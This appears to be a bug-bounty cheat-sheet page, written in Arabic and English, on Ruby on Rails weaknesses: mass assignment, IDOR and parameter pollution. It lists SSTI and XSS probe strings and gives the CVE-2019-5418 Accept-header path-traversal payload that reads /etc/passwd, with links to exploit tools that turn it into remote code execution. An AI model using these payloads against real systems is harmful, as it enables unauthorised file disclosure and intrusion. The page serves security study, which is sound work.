pentesting4arabs

php :https://web.facebook.com/groups/pentesting4arabs/permalink/1147252752397687/

ruby:

من الحاجات الموجوده في rails موضوع ال mass assignment و ممكن يسبب ثغرات كتير https://brakemanscanner.org/docs/warning_types/mass_assignment/

طبعا ممكن تعرفها لو لقيت ال request فيه حاجه زي user[name]=

أي ايند بوينت فيها بيانات مهمة باحولها json عادة بتجيب بيانات اكتر من المعروض في الصفحة العادية

IDORs - business logic vulns - Session Attacks

SSTI RUBY ERB

Queru=fuzz > Query[a]=fuzz > Query[]a=fuzz

try paramiter polution ssti csti ssi arrayi

{{9*9}}
//9*9
$(9*9)
$(1!=0)
$({{9*9}})
%//=9*9
// 81=9*9
<? {{9*9}} ?>
[\\9*9
"\\><{{9*9}}>
<? document.write({{9*9}}); ?>
#//</>♡<script>a//lert(1);<script>

CVE-2019-5418 - File Content Disclosure on Rails

الcve باختصار انت بتغير محتوى request header اللى اسمه accept

وتخليه بالمنظر ده

Accept: ../../../../../../../../../../etc/passwd{{

وبكده هتقدر توصل LFI وتعرض ملف etc/passwd وتقدر تعمل escelate ليها وتوصلها ل RCE وتأكسبلويت بالتول دى

https://github.com/mpgn/Rails-doubletap-RCE

https://hackerone.com/reports/473888

ودول كل الريسورس اللى قدرت اوصلها :

https://github.com/mpgn/CVE-2019-5418

https://chybeta.github.io/2019/03/16/Analysis-for%E3%80%90CVE-2019-5418%E3%80%91File-Content-Disclosure-on-Rails/

https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q

https://github.com/omarkurt/CVE-2019-5418

Example Report From H1 :

https://hackerone.com/reports/541858

وده لينك التمبلت بتاع cve فى nuclei

Last updated